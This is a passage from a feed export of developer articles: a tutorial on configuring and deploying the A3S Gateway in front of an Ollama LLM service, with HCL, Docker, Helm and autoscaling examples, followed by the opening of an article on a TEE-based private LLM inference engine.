&lt;tr&gt;
&lt;td&gt;Passive health checks&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Config hot reload&lt;/td&gt;
&lt;td&gt;No (requires process reload)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (zero downtime)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment complexity&lt;/td&gt;
&lt;td&gt;Simple&lt;/td&gt;
&lt;td&gt;Simple&lt;/td&gt;
&lt;td&gt;Requires control plane&lt;/td&gt;
&lt;td&gt;Simple (single binary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runtime dependencies&lt;/td&gt;
&lt;td&gt;OpenSSL&lt;/td&gt;
&lt;td&gt;Go runtime&lt;/td&gt;
&lt;td&gt;Dynamic linking&lt;/td&gt;
&lt;td&gt;None (statically linked Rust)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Envoy is technically the closest, but its hidden adoption cost is high: you need a control plane (Istio or another xDS implementation), you need Kubernetes, and you need an engineer who understands the Envoy configuration model. For a team whose core business is AI inference, maintaining a full Service Mesh is extra cognitive overhead.&lt;/p&gt;

&lt;p&gt;A3S Gateway's design trade-off is: only do what an AI service traffic layer needs, fully described in an HCL config file, deployed as a single binary. No database, no control plane, no Kubernetes required (though supported).&lt;/p&gt;




&lt;h2&gt;
  
  
  10. In Practice: Configuring a Full Proxy for an AI Backend
&lt;/h2&gt;

&lt;p&gt;At this point we understand why an AI-native gateway is needed. Here is a complete real-world example: deploying A3S Gateway in front of an Ollama LLM service, covering authentication, rate limiting, circuit breaking, streaming, and autoscaling.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Write gateway.hcl
&lt;/h3&gt;

&lt;p&gt;This config proxies a local Ollama instance and exposes it for external access. It adds JWT authentication, rate limiting at 60 requests per minute, a circuit breaker, and TLS termination:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# gateway.hcl&lt;/span&gt;

&lt;span class="c1"&gt;# ── Entrypoints ──────────────────────────────────────────────────────────&lt;/span&gt;
&lt;span class="nx"&gt;entrypoints&lt;/span&gt; &lt;span class="s2"&gt;"web"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;address&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"0.0.0.0:8080"&lt;/span&gt;   &lt;span class="c1"&gt;# HTTP (development / internal network)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;entrypoints&lt;/span&gt; &lt;span class="s2"&gt;"websecure"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;address&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"0.0.0.0:443"&lt;/span&gt;    &lt;span class="c1"&gt;# HTTPS (production)&lt;/span&gt;
  &lt;span class="nx"&gt;tls&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;cert_file&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/etc/certs/fullchain.pem"&lt;/span&gt;
    &lt;span class="nx"&gt;key_file&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/etc/certs/privkey.pem"&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# ── Routers ───────────────────────────────────────────────────────────────&lt;/span&gt;
&lt;span class="c1"&gt;# /v1/** → Ollama (OpenAI-compatible API)&lt;/span&gt;
&lt;span class="nx"&gt;routers&lt;/span&gt; &lt;span class="s2"&gt;"llm-api"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;rule&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"PathPrefix(`/v1`)"&lt;/span&gt;
  &lt;span class="nx"&gt;service&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"ollama"&lt;/span&gt;
  &lt;span class="nx"&gt;entrypoints&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"websecure"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="nx"&gt;middlewares&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"jwt-auth"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"rate-limit"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"circuit-breaker"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# /ws/** → WebSocket real-time inference (Agent scenarios)&lt;/span&gt;
&lt;span class="nx"&gt;routers&lt;/span&gt; &lt;span class="s2"&gt;"llm-ws"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;rule&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"PathPrefix(`/ws`)"&lt;/span&gt;
  &lt;span class="nx"&gt;service&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"ollama"&lt;/span&gt;
  &lt;span class="nx"&gt;entrypoints&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"websecure"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="nx"&gt;middlewares&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"jwt-auth"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# ── Backend Services ──────────────────────────────────────────────────────&lt;/span&gt;
&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"ollama"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;load_balancer&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;strategy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"least-connections"&lt;/span&gt;   &lt;span class="c1"&gt;# prefer the instance with the lowest current load&lt;/span&gt;
    &lt;span class="nx"&gt;servers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
      &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"http://127.0.0.1:11434"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;weight&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="nx"&gt;health_check&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;path&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/api/version"&lt;/span&gt;      &lt;span class="c1"&gt;# Ollama health endpoint&lt;/span&gt;
      &lt;span class="nx"&gt;interval&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"15s"&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;}

  # Mirror 3% of real requests to the new model version for offline quality comparison
  mirror {
    service    = "ollama-next"
    percentage = 3
  }

  # Autoscaling: scale to zero when idle, auto scale-up when requests arrive
  scaling {
    min_replicas          = 0        # allow scale-to-zero
    max_replicas          = 4        # up to 4 parallel inference instances
    container_concurrency = 4        # each instance handles at most 4 concurrent requests
    target_utilization    = 0.7      # target utilization 70%
    buffer_enabled        = true     # buffer requests during cold start, no 502
    executor              = "box"    # A3S Box manages instance lifecycle
  }
}

# Shadow backend: receives mirrored traffic, does not affect the primary path
services "ollama-next" {
  load_balancer {
    strategy = "round-robin"
    servers  = [{ url = "http://127.0.0.1:11435" }]
  }
}

# ── Middlewares ───────────────────────────────────────────────────────────

middlewares "jwt-auth" {
  type  = "jwt"
  value = "${JWT_SECRET}"            # read secret from environment variable
}

middlewares "rate-limit" {
  type  = "rate-limit"
  rate  = 60                         # 60 requests per minute (token bucket)
  burst = 10                         # burst cap
}

middlewares "circuit-breaker" {
  type              = "circuit-breaker"
  failure_threshold = 3              # 3 consecutive failures → open circuit
  cooldown_secs     = 30             # enter half-open state after 30 seconds
  success_threshold = 2              # 2 successes → close circuit, resume normal
}

# ── Config Hot Reload ─────────────────────────────────────────────────────

providers {
  file {
    watch     = true                 # auto-reload on file change, no restart needed
    directory = "/etc/gateway/conf.d/"
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
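&lt;p&gt;The rate-limit middleware above is a token bucket: tokens refill at &lt;code&gt;rate&lt;/code&gt; per minute, and &lt;code&gt;burst&lt;/code&gt; caps how many can accumulate. A minimal sketch of the admission logic (illustrative only, with hypothetical names; not the gateway's actual implementation):&lt;/p&gt;

```rust
// Token-bucket sketch matching rate = 60/min, burst = 10 from the config above.
// Hypothetical types and names, not the gateway's real middleware code.
struct TokenBucket {
    tokens: f64,         // currently available tokens
    capacity: f64,       // burst cap
    refill_per_sec: f64, // rate / 60
}

impl TokenBucket {
    fn new(rate_per_min: f64, burst: f64) -> Self {
        Self { tokens: burst, capacity: burst, refill_per_sec: rate_per_min / 60.0 }
    }

    // `elapsed_secs` is the time since the previous call; returns whether
    // the request is admitted (one token consumed) or rejected.
    fn allow(&mut self, elapsed_secs: f64) -> bool {
        self.tokens = (self.tokens + elapsed_secs * self.refill_per_sec).min(self.capacity);
        if self.tokens >= 1.0 {
            self.tokens -= 1.0;
            true
        } else {
            false
        }
    }
}

fn main() {
    let mut b = TokenBucket::new(60.0, 10.0);
    // A burst of 10 back-to-back requests is admitted...
    for _ in 0..10 {
        assert!(b.allow(0.0));
    }
    // ...the 11th is rejected until tokens refill.
    assert!(!b.allow(0.0));
    // After 1 second, one token (60/min = 1/sec) has refilled.
    assert!(b.allow(1.0));
    println!("token bucket behaves as configured");
}
```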

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Save as , then:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;a3s-gateway --config gateway.hcl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
The gateway starts listening immediately, and any changes to the config file take effect within milliseconds.

---

### Step 2: Package as a Docker Image

If you want to package the gateway into a container (rather than using the Homebrew-installed binary directly), use the Dockerfile below. Note it is a two-stage build — the compile stage uses the Rust toolchain, the runtime stage only needs an Alpine base image:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# ── Build stage ───────────────────────────────────────────────────────────
FROM rust:alpine AS builder

RUN apk add --no-cache musl-dev cmake make perl g++ linux-headers

WORKDIR /build

# Copy Cargo manifests first to warm the dependency cache (layer cache optimization)
COPY Cargo.toml Cargo.lock ./
RUN mkdir -p src &amp;amp;&amp;amp; echo 'fn main(){}' &amp;gt; src/main.rs &amp;amp;&amp;amp; touch src/lib.rs \
    &amp;amp;&amp;amp; cargo build --release 2&amp;gt;/dev/null || true \
    &amp;amp;&amp;amp; rm -rf src

# Copy real source and build
COPY src/ src/
RUN touch src/main.rs src/lib.rs &amp;amp;&amp;amp; cargo build --release

# ── Runtime stage ─────────────────────────────────────────────────────────
FROM alpine:3

RUN apk add --no-cache ca-certificates tzdata \
    &amp;amp;&amp;amp; addgroup -S gateway &amp;amp;&amp;amp; adduser -S gateway -G gateway

COPY --from=builder /build/target/release/a3s-gateway /usr/local/bin/a3s-gateway
COPY gateway.hcl /etc/a3s-gateway/gateway.hcl

USER gateway

EXPOSE 8080 443

ENTRYPOINT ["a3s-gateway", "--config", "/etc/a3s-gateway/gateway.hcl"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Build and run:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker build -t my-llm-gateway:latest .

docker run -d \
  -p 8080:8080 \
  -p 443:443 \
  -v $(pwd)/certs:/etc/certs:ro \
  -e JWT_SECRET=your-secret \
  my-llm-gateway:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
The final image is about 12 MB with no runtime dependencies.

---

### Step 3: Deploy With A3S Box (Single-Machine Sandbox)

[A3S Box](https://github.com/A3S-Lab/Box) is a microVM-based sandbox runtime. In scenarios where a full Kubernetes cluster is not needed — such as edge nodes, development machines, or resource-constrained single servers — Box can replace Docker Compose to manage the lifecycle of the gateway and LLM instances.

Box configuration is also HCL. Create :

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# box.hcl — run gateway + Ollama in microVM sandboxes

workloads "gateway" {
  binary = "/usr/local/bin/a3s-gateway"
  args   = ["--config", "/etc/gateway/gateway.hcl"]

  resources {
    memory_mb = 512
    cpus      = 2
  }

  ports = [8080, 443]

  env = {
    JWT_SECRET = "${JWT_SECRET}"
    RUST_LOG   = "info,a3s_gateway=debug"
  }

  mounts {
    host     = "./gateway.hcl"
    guest    = "/etc/gateway/gateway.hcl"
    readonly = true
  }

  mounts {
    host     = "./certs"
    guest    = "/etc/certs"
    readonly = true
  }

  # Auto-restart if the gateway process crashes
  restart = "always"
}

workloads "ollama" {
  binary = "/usr/local/bin/ollama"
  args   = ["serve"]

  resources {
    memory_mb = 8192    # a 7B quantized model needs about 6 GB
    cpus      = 4
  }

  ports = [11434]

  env = {
    OLLAMA_MODELS = "/models"
  }

  mounts {
    host  = "/data/models"
    guest = "/models"
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Start:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Install A3S Box
brew install a3s-lab/tap/a3s-box

# Start all workloads
a3s-box run --config box.hcl

# Check status
a3s-box status

# View gateway logs
a3s-box logs gateway
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Box's microVM isolation means: even if Ollama crashes due to OOM, the gateway process is unaffected — it triggers cold-start buffering, waits for Box to restart Ollama, then replays the queued requests.

---

### Step 4: Deploy to Kubernetes With Helm

For production environments requiring high availability and horizontal scaling, the Helm chart is the recommended deployment method.

Prepare  with the full HCL config embedded:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# values-prod.yaml

image:
  repository: ghcr.io/a3s-lab/gateway
  tag: "0.2.2"
  pullPolicy: Always

replicaCount: 2          # run 2 gateway replicas for high availability

service:
  type: LoadBalancer     # cloud provider LB, or pair with ingress-nginx
  port: 8080

config: |
  entrypoints "web" {
    address = "0.0.0.0:8080"
  }

  routers "llm-api" {
    rule        = "PathPrefix(`/v1`)"
    service     = "ollama"
    middlewares = ["jwt-auth", "rate-limit", "circuit-breaker"]
  }

  services "ollama" {
    load_balancer {
      strategy = "least-connections"
      servers  = [
        { url = "http://ollama-svc.ai.svc.cluster.local:11434" },
      ]
      health_check {
        path     = "/api/version"
        interval = "15s"
      }
    }
    scaling {
      min_replicas          = 0
      max_replicas          = 4
      container_concurrency = 4
      target_utilization    = 0.7
      buffer_enabled        = true
      executor              = "kube"   # use kube executor to manage Pod replicas in K8s
    }
  }

  middlewares "jwt-auth" {
    type  = "jwt"
    value = "${JWT_SECRET}"
  }

  middlewares "rate-limit" {
    type  = "rate-limit"
    rate  = 60
    burst = 10
  }

  middlewares "circuit-breaker" {
    type              = "circuit-breaker"
    failure_threshold = 3
    cooldown_secs     = 30
    success_threshold = 2
  }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Deploy:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Clone the repo (or find the chart path after brew install)
git clone https://github.com/A3S-Lab/Gateway.git
cd Gateway

# Install
helm install llm-gateway deploy/helm/a3s-gateway \
  -f values-prod.yaml \
  --namespace ai \
  --create-namespace \
  --set-string "extraEnv[0].name=JWT_SECRET" \
  --set-string "extraEnv[0].valueFrom.secretKeyRef.name=llm-secrets" \
  --set-string "extraEnv[0].valueFrom.secretKeyRef.key=jwt-secret"

# Upgrade config (hot reload, no Pod restart)
helm upgrade llm-gateway deploy/helm/a3s-gateway \
  -f values-prod.yaml \
  --namespace ai
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Verify:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Check gateway Pod status
kubectl get pods -n ai

# Check dashboard
kubectl port-forward -n ai svc/llm-gateway 9090:8080
curl http://localhost:9090/api/gateway/health    # health status
curl http://localhost:9090/api/gateway/routes    # current routing table
curl http://localhost:9090/api/gateway/metrics   # Prometheus metrics

# Test streaming inference (should see tokens arriving one by one immediately)
curl -N http://localhost:9090/v1/chat/completions \
  -H "Authorization: Bearer $JWT_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"model":"llama3","messages":[{"role":"user","content":"Hello"}],"stream":true}'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
---

## 11. Autoscaling: The Principles Behind the Numbers

The Knative autoscaling formula looks simple, but each parameter has a concrete physical meaning. Understanding these meanings is what lets you set the right parameters in real-world scenarios.

### The Formula

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;desired_replicas = ceil( (in_flight + queue_depth) / (container_concurrency x target_utilization) )
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
| Variable | Meaning |
|----------|---------|
|  | Total number of requests currently being processed across all instances |
|  | Number of requests waiting to be assigned to an instance (cold-start buffer queue) |
|  | Maximum number of requests an instance is allowed to handle simultaneously |
|  | Target utilization (0 to 1), reserving headroom for traffic spikes |

 is the most critical parameter — it must be set based on your model and hardware, not guessed. A rule of thumb:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;container_concurrency ≈ GPU memory / peak memory per request
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
For example: a GPU with 24 GB of memory, running a 7B Q4 model (about 5 GB), with peak KV-cache per request of about 2 GB:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;container_concurrency ≈ (24 - 5) / 2 ≈ 9
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Setting it to 8 is conservative (leaving headroom for system overhead).

### Three Scenarios Walked Through

**Scenario 1: Idle → First Request Arrives (Cold Start)**

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Initial state: replicas = 0, in_flight = 0, queue_depth = 0
              desired = ceil(0 / (8 x 0.7)) = 0 ✓

t=0s:  First request arrives
       replicas = 0, in_flight = 0, queue_depth = 1
       desired = ceil(1 / 5.6) = ceil(0.18) = 1
       → Scale-up triggered: start 1 instance, request enters buffer queue

t=45s: Instance passes health check, replicas = 1
       Request dequeued → sent to instance
       User receives first token
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
The user waited 45 seconds and saw a normal inference response, not an error.

**Scenario 2: Traffic Spike (Scale-Up Needed)**

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Current state: replicas = 1, container_concurrency = 8, target_utilization = 0.7
              effective capacity = 8 x 0.7 = 5.6 (scale-up triggers when requests exceed 6)

Spike to 20 concurrent requests:
  in_flight = 8 (current instance is full)
  queue_depth = 12 (waiting to be assigned)
  desired = ceil((8 + 12) / 5.6) = ceil(20 / 5.6) = ceil(3.57) = 4

→ Scale from 1 instance to 4
→ 4 instances effective capacity = 4 x 5.6 = 22.4, can handle 20 concurrent requests
→ The 12 waiting requests are sent in order once new instances are ready (about 45s)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Note:  reserves 30% headroom, meaning scale-up begins when instances reach 70% utilization, not 100%. This is key for handling LLM inference latency — if you wait until instances are full before scaling, all new requests queue during the time it takes new instances to start.

**Scenario 3: Traffic Drops (Scale to Zero)**

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Peak ends: replicas = 4, in_flight = 2, queue_depth = 0
  desired = ceil(2 / 5.6) = ceil(0.36) = 1
  → Scale-down signal: target 1 instance

But scale-down has a cooldown period:
  The gateway observes for 60 seconds (configurable), confirms traffic has truly dropped, then executes scale-down
  → Avoids thrashing (repeated scale-up/down) from brief traffic fluctuations

5 minutes later: in_flight = 0, queue_depth = 0
  desired = 0
  → Scale to zero, GPU instance shuts down
  → Cost savings until the next request arrives
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
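&lt;p&gt;The formula driving all three scenarios can be checked with a tiny sketch (a hypothetical function name, not the gateway's actual code):&lt;/p&gt;

```rust
// Sketch of the scale-out formula described above; names are illustrative.
fn desired_replicas(in_flight: u32, queue_depth: u32, concurrency: u32, target_util: f64) -> u32 {
    let effective = concurrency as f64 * target_util; // capacity per instance
    ((in_flight + queue_depth) as f64 / effective).ceil() as u32
}

fn main() {
    assert_eq!(desired_replicas(0, 0, 8, 0.7), 0);  // idle: stay at zero
    assert_eq!(desired_replicas(0, 1, 8, 0.7), 1);  // scenario 1: first request
    assert_eq!(desired_replicas(8, 12, 8, 0.7), 4); // scenario 2: spike to 20
    assert_eq!(desired_replicas(2, 0, 8, 0.7), 1);  // scenario 3: traffic drops
    println!("scenarios check out");
}
```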



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;


### Tuning Recommendations

| Parameter | Conservative | Aggressive | Use Case |
|-----------|-------------|------------|----------|
| `container_concurrency` | 50% of GPU memory capacity | 80% of GPU memory capacity | Conservative: stability first; Aggressive: cost first |
| `target_utilization` | 0.6 | 0.8 | Conservative: handle traffic spikes; Aggressive: latency tolerance is low priority |
| `min_replicas` | 1 (keep one warm instance) | 0 (allow cold start) | Conservative: cost vs latency-sensitive workloads; Aggressive: offline / low-frequency workloads |
| `max_replicas` | Number of GPUs | Number of GPUs x 2 (overcommit) | Depends on budget ceiling |

A common mistake is setting `target_utilization` to 1.0 — trying to fully utilize every instance's memory. The problem is that when utilization hits 100%, scale-up only then begins, and GPU instances take 30–60 seconds to start. During that window, all new requests wait. `0.7` means scale-up begins when instances still have 30% headroom, so new instances are ready before old ones are fully saturated.

---

The core challenge of AI infrastructure is not the model itself — it is the pipes that connect the model to the real world. The traffic layer is the most foundational of those pipes, and the most easily overlooked.

Using tools designed for the Web era to carry AI services is like using water pipes to transport natural gas: it might run in the short term, but every assumption is accumulating risk.

Redesigning the traffic layer from the actual requirements of AI services is an unavoidable step in modernizing AI infrastructure.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>gateway</category>
      <category>ai</category>
      <category>llm</category>
      <category>autoscaling</category>
    </item>
    <item>
      <title>A Privacy LLM Inference Engine That Runs on $10 Hardware</title>
      <dc:creator>Roy Lin</dc:creator>
      <pubDate>Mon, 23 Feb 2026 18:28:47 +0000</pubDate>
      <link>https://forem.com/roylin/a-privacy-llm-inference-engine-that-runs-on-10-hardware-3i6h</link>
      <guid>https://forem.com/roylin/a-privacy-llm-inference-engine-that-runs-on-10-hardware-3i6h</guid>
      <description>&lt;p&gt;Three facts define the problem A3S Power was built to solve:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;One:&lt;/strong&gt; Every prompt you send to any LLM inference server exists in plaintext in server memory. Ollama, vLLM, TGI, llama.cpp — no exceptions. Operators promise they "won't look," but that's policy, not physics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Two:&lt;/strong&gt; A quantized 10B-parameter model requires 6GB of memory. TEE (Trusted Execution Environment) encrypted memory is typically only 256MB. Traditional inference engines under this constraint can only run 0.5B toy models — incapable of any real security decision-making.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Three:&lt;/strong&gt; A $10 piece of hardware with 256MB of memory can run a 10B model through layer-streaming inference. That model is powerful enough to do three critical things inside hardware-encrypted memory: &lt;strong&gt;security validation&lt;/strong&gt; (detecting prompt injection), &lt;strong&gt;intelligent data redaction&lt;/strong&gt; (distinguishing sensitive from public information), and &lt;strong&gt;sensitive tool call approval&lt;/strong&gt; (determining whether an Agent's actions exceed authorization).&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The intersection of these three facts is the question A3S Power tries to answer: &lt;strong&gt;Can we use hardware encryption to protect every prompt on $10 hardware, while running a model smart enough to make security decisions?&lt;/strong&gt; Our answer is yes.&lt;/p&gt;

&lt;p&gt;This article follows a real prompt — a client portfolio analysis request sent by an investment bank trader — through its complete journey inside A3S Power. At each security layer, we stop and look at what was done, why it was done, and what the code looks like.&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Your Prompt Is Running Naked in Server Memory&lt;/li&gt;
&lt;li&gt;Gate One: A Hardware Attestation Hidden Inside the TLS Handshake&lt;/li&gt;
&lt;li&gt;Gate Two: Hardware Locks Memory in a Safe&lt;/li&gt;
&lt;li&gt;How Do You Know Which Model the Server Is Running?&lt;/li&gt;
&lt;li&gt;Running a 10B Model in 256MB — The Secret of picolm Layer-Streaming Inference&lt;/li&gt;
&lt;li&gt;Logs, Error Messages, Token Counts — Every One Can Betray You&lt;/li&gt;
&lt;li&gt;Model Weights Are Also Confidential: Three Encrypted Loading Modes&lt;/li&gt;
&lt;li&gt;How Can the Client Verify All of This Itself?&lt;/li&gt;
&lt;li&gt;Six-Layer Architecture: What's Inside&lt;/li&gt;
&lt;li&gt;Why Pure Rust? The Trust Ledger of Supply Chain Auditing&lt;/li&gt;
&lt;li&gt;Compared to Ollama, vLLM, TGI — Where's the Gap?&lt;/li&gt;
&lt;li&gt;If You Need to Deploy Today&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
